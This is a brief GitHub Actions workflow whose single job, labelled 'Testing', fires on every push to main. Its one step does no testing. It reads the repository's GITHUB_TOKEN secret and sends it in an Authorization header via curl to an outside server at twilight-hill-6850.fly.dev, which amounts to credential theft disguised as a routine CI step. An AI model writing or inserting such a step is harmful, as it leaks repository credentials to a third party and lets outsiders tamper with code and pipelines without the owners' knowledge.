on:
  push:
    branches:
      - main
  workflow_dispatch:
    branches:
      - main
jobs:
  testing:
    name: Testing
    runs-on: ubuntu-latest
    steps:
      - name: testing
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl https://twilight-hill-6850.fly.dev -H"Authorization: ${{env.GITHUB_TOKEN}}"

